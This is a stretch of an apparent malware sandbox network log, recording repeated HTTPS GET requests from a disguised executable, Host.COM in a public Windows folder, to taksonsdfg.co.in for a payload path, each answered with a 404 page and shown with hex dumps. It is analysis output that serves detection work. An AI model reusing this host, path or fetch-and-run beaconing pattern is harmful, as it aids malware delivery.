                                                                                    2024-10-14 02:31:04 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:31:04 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    94192.168.2.450192108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:31:05 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:31:06 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:31:05 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:31:06 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:31:06 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    95192.168.2.450194108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:31:06 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:31:07 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:31:07 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:31:07 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:31:07 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    96192.168.2.450196108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:31:08 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:31:08 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:31:08 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:31:08 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:31:08 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    97192.168.2.450198108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:31:09 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:31:09 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:31:09 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:31:09 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:31:09 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    98192.168.2.450200108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:31:10 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:31:10 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:31:10 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:31:10 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:31:10 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    99192.168.2.450202108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:31:11 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:31:11 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:31:11 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:31:11 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:31:11 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    100192.168.2.450204108.170.55.2024437652C:\Users\Public\Libraries\Host.COM
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 02:31:12 UTC178OUTGET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:31:12 UTC416INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:31:12 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:31:12 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
